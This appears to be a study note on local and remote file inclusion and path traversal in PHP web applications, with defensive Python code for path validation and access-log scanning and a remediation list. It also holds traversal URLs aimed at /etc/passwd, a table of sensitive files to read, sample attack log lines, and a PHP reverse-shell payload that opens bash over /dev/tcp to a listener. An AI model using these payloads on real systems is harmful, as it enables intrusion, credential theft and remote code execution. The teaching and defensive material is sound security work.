File Inclusion

  • The root cause is missing input validation: a user-controlled value (a file name or path) reaches a file-handling function without being sanitized or validated

  • Because the input is not validated, the user can point that function at any file the web server process can read, and that is the vulnerability

Risks

  • Can be used to read sensitive data (source code, configuration files, credentials, logs)

  • If you can get attacker-controlled content onto disk (an uploaded file, a poisoned log or session file, or a file in a world-writable directory such as /tmp) and then include it, the server executes it as code and you gain RCE

Path Traversal

  • Lets an attacker read files on the server's file system that the web server process can access

    • the application's own local files (source code, configuration) and anything else readable by that user

  • Exploited by manipulating the web application's URL (usually a parameter that names a file) so that the application opens files or directories outside its web root, typically with ../ sequences or an absolute path

  • Happens when user input is passed to a file-handling function such as file_get_contents in PHP (or include/require, which also execute the file) without validation


Common OS files

Location                       Description
/etc/issue                     Message or system identification printed before the login prompt
/etc/profile                   System-wide shell defaults (exported variables, file-creation mask, etc.)
/proc/version                  Version of the running Linux kernel and the compiler used to build it
/etc/passwd                    Every user account on the system (world-readable; the password hashes are in /etc/shadow)
/etc/shadow                    Password hashes and password-ageing information for every user (readable only by root)
/root/.bash_history            Shell command history of the root user
/var/log/dmesg                 Kernel ring-buffer messages, including those logged during system startup
/var/mail/root                 Mail spool for the root user
/root/.ssh/id_rsa              Private SSH key of root; the same path under any other user's home directory holds that user's key
/var/log/apache2/access.log    Requests served by the Apache web server (Debian/Ubuntu path)
C:\boot.ini                    Boot options on legacy Windows (NT/2000/XP/2003) systems with BIOS firmware

  • Examples

    • http://TARGET_URL/index.php?file=/etc/passwd

    • http://TARGET_URL/index.php?file=../../../../etc/passwd (relative form, for when the application prepends its own directory to the value)
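The root cause described in the Path Traversal notes above, and the allowlist-over-denylist advice from the Remediation section, side by side as an added example (this is not code from the original page; Python is used so it runs stand-alone, but the vulnerable pattern is the same as file_get_contents("pages/" . $_GET["file"]) in PHP). The directory layout, the file names and the ALLOWED_PAGES map are constructed for the demonstration:

```python
import os
import tempfile

# Added example, not the page's own code: the paths, file names and the
# ALLOWED_PAGES map below are constructed for the demonstration.


def vulnerable_path(base_dir: str, user_file: str) -> str:
    """The pattern that causes path traversal.

    os.path.join() discards base_dir when user_file is absolute, and it does
    nothing about '../' segments, so both '/etc/passwd' and '../../etc/passwd'
    escape base_dir. PHP's file_get_contents("pages/" . $_GET["file"]) has the
    same problem.
    """
    return os.path.join(base_dir, user_file)


def safe_path(base_dir: str, user_file: str) -> str:
    """Canonicalise, then check the result is still inside base_dir.

    realpath() resolves '..' segments *and* symlinks, so a link inside
    base_dir that points outside is caught too. The check must run on the
    fully URL-decoded value (web frameworks decode once; decode again if the
    application does its own decoding).
    """
    if "\x00" in user_file:
        raise ValueError("null byte in file name")
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, user_file))
    # commonpath() rather than startswith(): '/srv/pages2/x' starts with
    # '/srv/pages' but is not inside it.
    if candidate == base or os.path.commonpath([base, candidate]) != base:
        raise ValueError("file name escapes the allowed directory")
    return candidate


# Strongest option from the remediation list: an allowlist that maps a page
# identifier to a fixed file, so no path from the user ever reaches the FS.
ALLOWED_PAGES = {"home": "home.php", "about": "about.php", "contact": "contact.php"}


def allowlisted_path(base_dir: str, page: str) -> str:
    if page not in ALLOWED_PAGES:
        raise ValueError("unknown page")
    return os.path.join(os.path.realpath(base_dir), ALLOWED_PAGES[page])


def demo() -> dict:
    """Build a throwaway tree (constructed data) and exercise both versions."""
    with tempfile.TemporaryDirectory() as root:
        base = os.path.join(root, "pages")
        os.mkdir(base)
        with open(os.path.join(base, "home.php"), "w") as fh:
            fh.write("<h1>home</h1>")
        secret = os.path.join(root, "secret.txt")  # stands in for /etc/passwd
        with open(secret, "w") as fh:
            fh.write("root:x:0:0:root:/root:/bin/bash")

        results = {}
        # Vulnerable version: both payloads resolve to the file outside base.
        results["vuln_traversal_escapes"] = (
            os.path.realpath(vulnerable_path(base, "../secret.txt")) == os.path.realpath(secret))
        results["vuln_absolute_escapes"] = vulnerable_path(base, secret) == secret
        # Hardened version: the legitimate name works, escape attempts raise.
        results["safe_allows_legit"] = (
            safe_path(base, "home.php") == os.path.realpath(os.path.join(base, "home.php")))
        for name, payload in [("traversal", "../secret.txt"),
                              ("absolute", secret),
                              ("null_byte", "home.php\x00.txt"),
                              ("empty", "")]:
            try:
                safe_path(base, payload)
                results["safe_blocks_" + name] = False
            except ValueError:
                results["safe_blocks_" + name] = True
        results["allowlist_ok"] = allowlisted_path(base, "home").endswith("home.php")
        try:
            allowlisted_path(base, "../secret")
            results["allowlist_blocks"] = False
        except ValueError:
            results["allowlist_blocks"] = True
        return results


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The commonpath check is the part people get wrong: a startswith() comparison on the string prefix accepts sibling directories with a shared prefix, and a check done before canonicalisation accepts "pages/../../etc/passwd". The allowlist variant avoids the whole class of bugs because the user's value is only ever used as a dictionary key.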

Remote File Inclusion (RFI)

  • Technique that makes the vulnerable application include a file fetched from a remote, attacker-controlled server (for example a PHP payload served over HTTP)

  • Requirements on the PHP side: allow_url_fopen must be On, and for include/require to accept a URL allow_url_include must be On as well (it is Off by default, which is why RFI is rarer than LFI on current installs)

  • Gives the attacker RCE on the server, because the fetched file is executed, and can also lead to

    • Sensitive Information Disclosure

    • Cross-site Scripting (XSS)

    • DoS

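Because /var/log/apache2/access.log records every request, it is also where the Path Traversal and RFI attempts described above show up after the fact. The following added example (not from the original page) scans constructed Apache combined-format log lines for the payload shapes discussed: ../ traversal including double-encoded forms, absolute paths to the sensitive files in the table, remote URLs (RFI), PHP wrappers such as php://filter, and %00 truncation. The log lines, the TEST-NET addresses and the parameter name file are all made up for the example:

```python
import re
from urllib.parse import unquote, urlsplit

# Added example, not the page's own code. The log lines are constructed
# (TEST-NET addresses) and the parameter name "file" is an assumption.

# Apache "combined" format: client ident user [timestamp] "METHOD target PROTO" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)

SAMPLE_LOG = [  # constructed sample data
    '203.0.113.7 - - [10/Oct/2023:13:55:36 +0000] "GET /index.php?file=about HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.23 - - [10/Oct/2023:13:56:01 +0000] "GET /index.php?file=../../../../etc/passwd HTTP/1.1" 200 1843 "-" "curl/8.0"',
    '198.51.100.23 - - [10/Oct/2023:13:56:09 +0000] "GET /index.php?file=..%252f..%252fetc%252fshadow HTTP/1.1" 200 0 "-" "curl/8.0"',
    '198.51.100.23 - - [10/Oct/2023:13:57:12 +0000] "GET /index.php?file=http://198.51.100.23/shell.txt HTTP/1.1" 200 77 "-" "curl/8.0"',
    '198.51.100.23 - - [10/Oct/2023:13:58:40 +0000] "GET /index.php?file=php://filter/convert.base64-encode/resource=index.php HTTP/1.1" 200 4096 "-" "curl/8.0"',
    '198.51.100.23 - - [10/Oct/2023:13:59:02 +0000] "GET /index.php?file=/etc/passwd HTTP/1.1" 200 1843 "-" "curl/8.0"',
    '198.51.100.23 - - [10/Oct/2023:13:59:30 +0000] "GET /index.php?file=../../etc/passwd%00.php HTTP/1.1" 200 1843 "-" "curl/8.0"',
    '203.0.113.9 - - [10/Oct/2023:14:00:05 +0000] "POST /login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
]


def full_unquote(value: str, rounds: int = 3) -> str:
    """Percent-decode until stable so double-encoded payloads (%252e%252e) normalise."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def classify(value: str) -> list:
    """Return the reasons a parameter value looks like a file-inclusion attempt."""
    v = full_unquote(value).replace("\\", "/")  # treat Windows separators like '/'
    reasons = []
    if "\x00" in v:
        reasons.append("null-byte")              # %00 truncation (old PHP versions)
    if re.search(r"(^|/)\.\.(/|$)", v):
        reasons.append("traversal")
    if re.match(r"^(/etc/|/proc/|/root/|/var/(log|mail)/|[a-z]:/)", v, re.I):
        reasons.append("absolute-sensitive-path")
    if re.match(r"^(https?|ftps?)://", v, re.I):
        reasons.append("remote-url")             # RFI; only works with allow_url_include=On
    if re.match(r"^(php|expect|phar|zip|glob|file)://|^data:", v, re.I):
        reasons.append("php-wrapper")            # php://filter, expect://, data:
    return reasons


def scan_log(lines) -> list:
    """Parse access-log lines and report every query parameter that looks like LFI/RFI."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        query = urlsplit(m.group("target")).query
        for pair in query.split("&"):
            name, _, raw = pair.partition("=")
            if not raw:
                continue
            reasons = classify(raw)
            if reasons:
                findings.append({
                    "ip": m.group("ip"),
                    "param": name,
                    "value": full_unquote(raw),
                    "reasons": reasons,
                })
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f'{f["ip"]} {f["param"]}={f["value"]!r} -> {", ".join(f["reasons"])}')
```

Two caveats when running something like this against real logs: a 200 response to a traversal request is a much stronger signal than a 404, so the status code is worth keeping in the finding, and POST bodies are not in the access log at all, so inclusion parameters sent in a form body need a different source (application logs or a WAF).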

Local File Inclusion

  • Turning inclusion into RCE: write a PHP reverse shell to a location you can include (an upload directory, /tmp, or a log you can poison), or host it on your own server for RFI, and include it through the vulnerable parameter; replace <IP> and <PORT> with your listener's address and have the listener (e.g. nc -lvnp <PORT>) running before triggering the include

<?php
// Reverse shell: spawns an interactive bash with its stdin/stdout/stderr attached to a TCP socket back to <IP>:<PORT>
exec("/bin/bash -c 'bash -i >& /dev/tcp/<IP>/<PORT> 0>&1'");
?>

Remediation

  • Keep system and services, including web application frameworks, updated with the latest version

  • Turn off error display in production (display_errors = Off) so that error messages do not leak the application's file system paths and other revealing information

  • A WAF is a useful extra layer against common file-inclusion payloads, but it is defense in depth, not a fix for the underlying bug

  • Disable the PHP features that enable file inclusion attacks if your web app doesn't need them: set allow_url_fopen and allow_url_include to Off in php.ini

  • Carefully analyze the web application and allow only the protocols and PHP wrappers (php://, data:, expect://, etc.) that it actually needs

  • Never trust user input, and make sure to implement proper input validation against file inclusion: canonicalize the path and check that it stays inside the intended directory, and reject null bytes and encoded traversal sequences

  • Prefer an allowlist of permitted file names and locations (for example, map a page identifier to a fixed file) over a denylist of bad patterns; denylists are routinely bypassed with encoding and ../ variations
